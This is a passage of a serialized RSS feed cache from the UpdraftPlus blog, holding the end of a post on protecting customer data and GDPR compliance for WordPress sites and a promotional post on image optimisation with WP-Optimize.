400;\">60% and 73%</span></a><span style=\"font-weight: 400;\"> of data collected by companies is unused for analytics, which shows that organisations probably don’t need as much information as they think they do to conduct business. </span></p>\n<p><span style=\"font-weight: 400;\">What comprises essential data for your company depends on your marketing goals and your ability to analyze the data to gain insights. Since marketing goals evolve, regularly evaluating the type of data you collect can save you trouble and aid your compliance with data protection regulations. </span></p>\n<h4><b>2. Perform routine vulnerability and risk assessments</b></h4>\n<p><span style=\"font-weight: 400;\">According to the </span><a href=\"https://www.cisecurity.org/controls/\"><span style=\"font-weight: 400;\">Center for Internet Security (CIS)</span></a><span style=\"font-weight: 400;\">, vulnerability management is the third most important action you can take to protect your organization from data breaches. </span></p>\n<p><span style=\"font-weight: 400;\">The processes involved in vulnerability management include identifying possible security breaches and classifying them according to their threat level. Regular risk and vulnerability assessments help you identify holes in your defences and take measures to plug them. </span></p>\n<p><span style=\"font-weight: 400;\">When carrying out these assessments, you should leave no stone unturned. Inspect and evaluate your data storage, software and data security policies &#8211; like the use of personal devices and remote ‘work from home’ access for employees. </span></p>\n<p><span style=\"font-weight: 400;\">WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a security plugin that enforces a lot of good security practices.</span></p>\n<p><span style=\"font-weight: 400;\">You can also install the </span><a href=\"https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/\"><span style=\"font-weight: 400;\">All In One WordPress Security plugin</span></a><span style=\"font-weight: 400;\"> on your WordPress site. This plugin can help improve your website security. It works by analyzing your site and reduces security risk by checking for vulnerabilities. By implementing and enforcing the latest recommended WordPress security practices and techniques, you can help patch any potential weaknesses, before they become an issue. </span></p>\n<h4><b>3. Involve every member of your team </b></h4>\n<p><span style=\"font-weight: 400;\">It is imperative that every employee play their role to prevent a breach. Your defences are only as strong as your weakest link and without proper security awareness and education, employees can unknowingly become that weak link to hackers and cyber criminals. </span></p>\n<p><span style=\"font-weight: 400;\">Employees should also be trained on how to identify security threats &#8211; what comprises “sensitive information” and how to immediately report data leakages and breaches. Employees should also be aware of the latest phishing and hacking techniques employed by cybercriminals (such as legitimate looking fake emails), and how to prevent them.  </span></p>\n<h4><b>4. Adhere to data protection regulations </b></h4>\n<p><span style=\"font-weight: 400;\">Data protection laws and guidelines are more stringent today than they were just a few years ago. This is in part because the amount of personal data collected by organizations has increased dramatically with the advent of smart phones. Additionally, the rise in the sophistication and potency of cybercriminals and their operations has seen ‘hacking’ and the theft of personal data become an almost acceptable career in some countries. </span></p>\n<p><span style=\"font-weight: 400;\">In this day and age, abiding by data protection regulations such as GDPR helps you to prevent leakages and avoid potential fines. It can also save your company’s reputation and increase customer trust. </span></p>\n<h4><b>5. Restrict data access </b></h4>\n<p><span style=\"font-weight: 400;\">Just like secrets, the fewer people that have access to data, the lower the chance that it will be leaked. It is worth remembering that not all employees need the same level of access to sensitive customer information.  </span></p>\n<p><span style=\"font-weight: 400;\">A good code of practice to follow is to segment customer data, and then grant levels of access to staff for each segment depending on the staff member’s need to access that information. </span></p>\n<p><span style=\"font-weight: 400;\">While this may be a time consuming and painstaking process, compared to potential lawsuits, hefty fines, reputation damage and potentially millions of dollars in lost revenue; it is more than worth it. </span></p>\n<h4><b>6. Data encryption </b></h4>\n<p><span style=\"font-weight: 400;\">Data encryption is the practice of encoding data (such as messages and files) to make them unreadable to unauthorized persons. By following the process of converting sensitive information from the plain, readable format to ciphertext; you can achieve data that is in an encoded format. </span></p>\n<p><span style=\"font-weight: 400;\">A crucial aspect of your data security plan should include provisions for encryption of sensitive data. Personal data across all devices used for company functions should be encrypted including messages, calls, and emails. </span></p>\n<p><span style=\"font-weight: 400;\">With </span><a href=\"https://www.druva.com/glossary/what-is-data-encryption-definition-and-related-faqs/\"><span style=\"font-weight: 400;\">data encryption</span></a><span style=\"font-weight: 400;\">, you can securely save sensitive data on the cloud or on connected servers. </span></p>\n<h4><b>7. Two-Factor authentication (2FA)</b></h4>\n<p><span style=\"font-weight: 400;\">Two-factor authentication is a data security measure that requires two different forms of identification to gain access to an online account. 2FA combines a password with another credential &#8211; such as a one time password, security badges or biometric data (such as a fingerprint). This adds an additional layer of security and by requiring 2FA across all company devices and systems &#8211; this would improve your data security hugely. </span></p>\n<h4><b>8. Regular security updates </b></h4>\n<p><span style=\"font-weight: 400;\">You may have suspected it, but the main reason giant companies like Apple provide regular updates for their software (iOS &amp; Mac OS) is to patch up weak spots and loopholes that hackers could potentially exploit. </span></p>\n<p><span style=\"font-weight: 400;\">By regularly updating your security software, you can reduce its weaknesses and increase its efficiency. </span></p>\n<h4><b>9. Online and offline data backup </b></h4>\n<p><span style=\"font-weight: 400;\">While this is not particularly intended to prevent a breach, it can save you a lot of time, money, and trouble in the event of data theft or loss. Having a secure backup means that your customer subscription data, as well as other sensitive information, is safe. </span></p>\n<p><span style=\"font-weight: 400;\">The longer your site is suffering from downtime as you try to recover the missing data, the more money you lose. A recent </span><a href=\"https://twitter.com/growwithco\"><span style=\"font-weight: 400;\">report</span></a><span style=\"font-weight: 400;\"> suggests companies can lose as much as $300,000 per hour due to the downtime in the event of a hack, bug or server issue. </span></p>\n<p><span style=\"font-weight: 400;\">By backing up your site using </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus</span></a><span style=\"font-weight: 400;\">, you can be sure that you will always have a secure backup of your original website, should you ever need to restore it. </span></p>\n<h4><b>10. Have a data breach response plan </b></h4>\n<p><span style=\"font-weight: 400;\">If all else fails and your preventative measures are still breached, then what? Having a Plan B, such as an </span><a href=\"https://securityscorecard.com/blog/the-ultimate-data-breach-response-plan\"><span style=\"font-weight: 400;\">organizational data breach response plan</span></a><span style=\"font-weight: 400;\">, can mitigate the potential damage of a data breach. </span><span style=\"font-weight: 400;\">Under GDPR guidelines, your customers have the right to know that their data and personal information could be compromised within the first 72 hours of a breach. As such, your plan should always include how to inform your customers. </span><span style=\"font-weight: 400;\">According to the </span><a href=\"https://www.uschamber.com/co/run/technology/data-backup-facts\"><span style=\"font-weight: 400;\">US Chamber of commerce</span></a><span style=\"font-weight: 400;\">, 68% of small businesses lack a disaster recovery plan. Putting together a plan for your organization puts you a step ahead of the curve. </span></p>\n<h2><b>Data breaches that companies can experience</b></h2>\n<p><span style=\"font-weight: 400;\">Data breaches can occur through various means, but here are the most common. </span></p>\n<p><b>Phishing<br />\n</b><span style=\"font-weight: 400;\">Phishing is when cyber criminals try to gain access to sensitive data, such as your banking details and passwords. They achieve this by posing as a reputable company or individual you may already have dealings with and often informing you of a problem that requires you to click on a link that downloads malicious software on your computer. Training employees on how to spot phishing attempts in emails, messages and adverts can help prevent these types of attacks. </span></p>\n<p><b>Brute force cyber attack<br />\n</b><span style=\"font-weight: 400;\">This is a more direct type of attack GDPRwhere hackers use software tools to try to guess your password. With the rapid speed of modern computers, it takes far less time to guess passwords correctly than it used to. </span><span style=\"font-weight: 400;\">Your best chance against this type of cyber attack is to have longer and more secure passwords. A good practice would be the use of password phrases; as they are easier to remember, and harder to guess. </span></p>\n<p><b>Malware<br />\n</b><span style=\"font-weight: 400;\">Intruders can install malware or spyware on your devices to allow them access confidential files without your notice. Malware is typically a piece of malicious software, and it’s activities and presence can go unnoticed for a long enough period of time to cause significant damage. </span><span style=\"font-weight: 400;\">Malware can be installed on your computer physically or virtually through sources such as an email link. Learning how to spot these attacks and restricting access to your computer can help avoid this type of attack. </span></p>\n<p><b>Human error, accidents and theft<br />\n</b><span style=\"font-weight: 400;\">In a way, human error will play a role in almost all the types of cyber attacks. Granted, malicious software will take advantage of already existing weaknesses in your system’s defences, but you still have to be careless with your computer or click on a malicious link for it to work. </span><span style=\"font-weight: 400;\">On the other hand, a stolen computer or a laptop left at a bus stop can potentially give the thief access to sensitive data. </span></p>\n<h2><b>What to do in the event of a data breach? </b></h2>\n<p><span style=\"font-weight: 400;\">Bad press, lawsuits, financial losses and distrust are some of the effects of a data breach. In the event of a breach, the focus shifts to how you can manage your organisations reputation and build back trust in employees and customers alike. Here is how you can do that: </span></p>\n<p><b>Good PR<br />\n</b><span style=\"font-weight: 400;\">An excellent PR team will work to ensure your customers understand you are on their side. It helps if you have a PR team on standby with a pre-planned sequence of actions that can be implemented within hours in the event of a data breach.  </span></p>\n<p><b>Transparency<br />\n</b><span style=\"font-weight: 400;\">What’s worse than a breach and leak of sensitive customer data is a cloud of dishonesty and deceit in its aftermath. The pushback and consequent cost of the breach can be mitigated with a level of transparency and cooperation with the affected customers. </span></p>\n<p><b>Kick-start your data breach response plan<br />\n</b><span style=\"font-weight: 400;\">Regardless of how much you try to prevent it, with advancing technology and cybercrime sophistication, there’s still a chance of a data breach, no matter how small. Actions in your response plan should include a public address and some sort of compensation plan for the affected customers. </span></p>\n<h2><b>Conclusion </b></h2>\n<p><span style=\"font-weight: 400;\">$4.24 million is the average cost of a data breach in 2021 according to </span><a href=\"https://www.ibm.com/security/data-breach\"><span style=\"font-weight: 400;\">IBM</span></a><span style=\"font-weight: 400;\">. That’s a significant enough amount of damage for it to be taken seriously. </span><span style=\"font-weight: 400;\">Whether or not your business operations are digital, if your customer data is stored on any technological device, you should pay attention to the steps above. </span><span style=\"font-weight: 400;\">Learning how to protect customer data and prevent GDPR breaches imply that you are prioritizing your customers’ privacy. That practice boosts your reputation and encourages brand loyalty. </span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/\">How to protect customer data and prevent GDPR breaches on your WordPress site</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:107:\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"https://updraftplus.com/how-to-protect-customer-data-and-prevent-gdpr-breaches-on-your-wordpress-site/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:94:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"Speed up your WordPress site using image optimization\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/WXNMF6A23Lg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 14:55:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:8:{i:0;a:5:{s:4:\"data\";s:13:\"Uncategorized\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:14:\"Google ranking\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:17:\"image compression\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:14:\"image optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:13:\"image optimse\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:3:\"SEO\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:11:\"WP-Optimise\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:11:\"WP-Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://updraftplus.com/?p=1217583\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:762:\"<p>When evaluating the speed and performance of your website, there are over 200 factors that search engines like Google use to rank content and web pages. Some of these factors are known, such as site update frequency, while the weight &#8230; <a href=\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/\">Speed up your WordPress site using image optimization</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:14137:\"<p><iframe loading=\"lazy\" title=\"Speed up your WordPress site using image optimization\" width=\"1080\" height=\"608\" src=\"https://www.youtube.com/embed/SOaqwJIrhfk?feature=oembed\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe></p>\n<p><span style=\"font-weight: 400;\">When evaluating the speed and performance of your website, there are over </span><a href=\"https://www.webfx.com/blog/internet/seo-ranking-factors/\"><span style=\"font-weight: 400;\">200 factors</span></a><span style=\"font-weight: 400;\"> that search engines like Google use to rank content and web pages. Some of these factors are known, such as site update frequency, while the weight of other factors &#8211; such as meta-tag spamming, are not known to the extent they impact the ranking score and how they affect a site.</span></p>\n<p><span style=\"font-weight: 400;\">Possibly the most important factor when deciding your site&#8217;s Google ranking is it’s loading speed and how long the site takes to completely load on both mobile and desktop.</span></p>\n<p><span style=\"font-weight: 400;\">An important part of the loading speed process, your site’s overall SEO score and speed ranking is image size and image optimization. In this blog we will be looking at why this is important and why you should always have optimized images on your site.</span></p>\n<h4><span style=\"font-weight: 400;\">Why is image optimization important?</span></h4>\n<p><span style=\"font-weight: 400;\">Since Google considers site loading speed to be one of the </span><a href=\"https://cognitiveseo.com/blog/22865/page-speed-seo/\"><span style=\"font-weight: 400;\">main ranking factors</span></a><span style=\"font-weight: 400;\"> when evaluating a site’s SEO score, Google focuses on the overall user experience as a metric for website quality. The speed of a site not only has an impact on SEO score, but has also shown to have a large role in the bounce rate of users, as they typically tend to leave a site if it takes more than 3 seconds to load.</span></p>\n<p><span style=\"font-weight: 400;\">Slow site speed can be responsible for abandoned carts, drops-in conversion rates and other problems that might cause the user experience to be negatively rated. If an e-commerce site is making $100,000 per day, a 1 second page delay could potentially cost you $2.5 million in </span><a href=\"https://neilpatel.com/blog/loading-time/\"><span style=\"font-weight: 400;\">lost sales every year</span></a><span style=\"font-weight: 400;\">. A large portion of a website’s weight and loading speed factors can be attributed to the size of your image. Compressing your images will reduce the time it takes to load them in a user&#8217;s browser, improving the overall loading speed of the website.</span></p>\n<p><span style=\"font-weight: 400;\">It should also be noted that a high speed internet connection is not going to solve the problem of a slow loading website, as the loading speed is largely dictated by the host that is hosting your files, and can only upload them at a certain bandwidth.</span></p>\n<h4><span style=\"font-weight: 400;\">How can you check your site speed?</span></h4>\n<p><span style=\"font-weight: 400;\">It is possible to check your site speed using simple online tools. Some of the most commonly used web tools are listed below;</span></p>\n<h4>Google Insights</h4>\n<p><span style=\"font-weight: 400;\">This is a developer’s tool that was introduced by Google for the single purpose of identifying site speed on a user&#8217;s desktop or mobile. This site should typically be your first port of call when evaluating site speed, as it belongs to the same organization that is responsible for ranking your website. As such, this adds a further level of legitimacy and behind the scenes knowledge when evaluating your site speed.</span></p>\n<p><span style=\"font-weight: 400;\">Insights not only measures the speed for both desktop and mobile, but also provides a breakdown of all the reasons why and where any issue to the site speed lies. </span><a href=\"https://developers.google.com/speed/pagespeed/insights/\"><span style=\"font-weight: 400;\">Google Insights</span></a><span style=\"font-weight: 400;\"> also delves deep into the images and checks for the potential reduction in file size. This platform also allocates a score to your website, allowing you to gauge any short term improvements and errors that you may have made, which you might not have realized otherwise. </span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143518.758.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217612\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143518.758.jpg\" alt=\"\" width=\"623\" height=\"530\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143518.758.jpg 623w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143518.758-480x408.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 623px, 100vw\" /></a></p>\n<h4>GT Metrix</h4>\n<p><a href=\"https://gtmetrix.com/\"><span style=\"font-weight: 400;\">GT Metrix</span></a><span style=\"font-weight: 400;\"> is broadly similar to Google Insights, in that It more or less provides the same information and allocates a ranking score for your website. </span><span style=\"font-weight: 400;\">GT Metrix not only identifies any problems with your site, but also provides potential solutions to any detected speed issues that may be slowing you down. If you are looking for something outside the Google ecosystem, this is a site that you should consider getting familiar with. </span></p>\n<p><span style=\"font-weight: 400;\">If you have checked your site speed and image size has been flagged up as an issue, where do you go from there?</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143538.301.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217611\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143538.301.jpg\" alt=\"\" width=\"624\" height=\"361\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143538.301.jpg 624w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143538.301-480x278.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 624px, 100vw\" /></a></p>\n<h4><span style=\"font-weight: 400;\">WP-Optimize &#8211; the WordPress plugin that makes image optimization simple</span></h4>\n<p><a href=\"https://getwpo.com/buy/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\"> is one of the leading WordPress optimization plugins that is trusted by over a million users all over the world, with a 4.8 out of 5 ranking on WP.org. Wp-Optimize focuses on the 3 main components when optimizing your site:</span></p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Cleaning your database.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Compressing your Images.</span></li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Website caching.</span></li>\n</ol>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143551.247.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217610\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143551.247.jpg\" alt=\"\" width=\"624\" height=\"422\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143551.247.jpg 624w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143551.247-480x325.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 624px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">While there are several overall different methods WP-Optimize can help with your site SEO, we will be focusing on the image compression aspect of the plugin for this blog. As mentioned above, image compression has long been an issue when it comes to site speed and just making these changes can have a big impact on loading times..</span></p>\n<p><span style=\"font-weight: 400;\">WP-Optimize uses a cutting edge ‘lossy technique’ to compress large image files ( high load times) to smaller compressed versions ( low load times). All of the compressed images are then directly saved to the site’s image library, where they are accessible and reversible to their original size (should you wish to change them back). </span></p>\n<p><span style=\"font-weight: 400;\">With WP-Optimize, you can compress different image file formats including; JPG, PNG, GIF, BMP and TIFF. When deciding which images you should compress, it is recommended that Images up to the size of 5 MB should be optimized for faster loading speeds. You should also always remember to take a back-up of your site using </span><a href=\"https://updraftplus.com/\"><span style=\"font-weight: 400;\">UpdraftPlus </span></a><span style=\"font-weight: 400;\">before compressing any images or making any kind of change to your site, as potential issues may arise.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143606.751.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217609\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143606.751.jpg\" alt=\"\" width=\"624\" height=\"430\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143606.751.jpg 624w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143606.751-480x331.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 624px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">Additional features of WP-Optimize image optimization include:</span></p>\n<h4><span style=\"font-weight: 400;\">Bulk compression</span></h4>\n<p><span style=\"font-weight: 400;\">Allows you to select and compress all your images together. This can potentially save you a lot of time, as some sites can have hundreds, if not thousands of images that need compressing.</span></p>\n<h4><span style=\"font-weight: 400;\">Intelligent, multi-pass lossy compression algorithm</span></h4>\n<p><span style=\"font-weight: 400;\">The algorithm is created in such a way that it gives users twice the compression with a lot less loss of image quality.</span></p>\n<h4><span style=\"font-weight: 400;\">Restore to the original image</span></h4>\n<p><span style=\"font-weight: 400;\">While ‘Ctrl+Z’ can come in very handy in lots of online applications, it isn’t something that is usually found with an image optimization plugin. With WP-Optimize, you can revert back to the original images at any time. </span></p>\n<h4><span style=\"font-weight: 400;\">Auto compress </span></h4>\n<p><span style=\"font-weight: 400;\">Auto compress allows for all of your future images that will be uploaded to your website to be compressed automatically. This means you will not have to manually compress your images every time you upload a new one. Just select your compression settings and WP-Optimize will compress all of your images in real time as they are being uploaded onto the website.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143624.454.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217608\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143624.454.jpg\" alt=\"\" width=\"624\" height=\"431\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143624.454.jpg 624w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143624.454-480x332.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 624px, 100vw\" /></a></p>\n<h4><span style=\"font-weight: 400;\">Keep your EXIF data</span></h4>\n<p><span style=\"font-weight: 400;\">If your website is related to high end photography (for example, a wedding photography site), the photographic data of your images can be incredibly important. With most image compression plugins, this data would be lost post compression. But with WP-Optimize, you can select to keep the original photographic EXIF data, even if you decide to compress a 2GB image to 500k. </span></p>\n<h4><span style=\"font-weight: 400;\">Conclusion</span></h4>\n<p><span style=\"font-weight: 400;\">WP-Optimize is a great option that includes many different optimization factors in one convenient plugin. As an overall WordPress optimization plugin, WP-Optimize is as good as, if not better, than some of the ‘top’ paid plugins. The following chart shows how WP-Optimize compares to leading SEO plugins like WP-Rocket, W3 and WP Fastest Cache.</span></p>\n<p><a href=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143637.521.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-1217607\" src=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143637.521.jpg\" alt=\"\" width=\"624\" height=\"250\" srcset=\"https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143637.521.jpg 624w, https://updraftplus.com/wp-content/uploads/2021/09/New-Project-2021-09-03T143637.521-480x192.jpg 480w\" sizes=\"(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 624px, 100vw\" /></a></p>\n<p><span style=\"font-weight: 400;\">If you are looking to improve the loading speed of your site, compressing your images is a great way to start. Download WP-Optimize today and see the difference a good optimization plugin can make to your WordPress site.</span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/\">Speed up your WordPress site using image optimization</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"https://updraftplus.com/speed-up-your-wordpress-site-using-image-optimization/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:88:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Why should you add two-factor authentications (2FA) to your WordPress site in 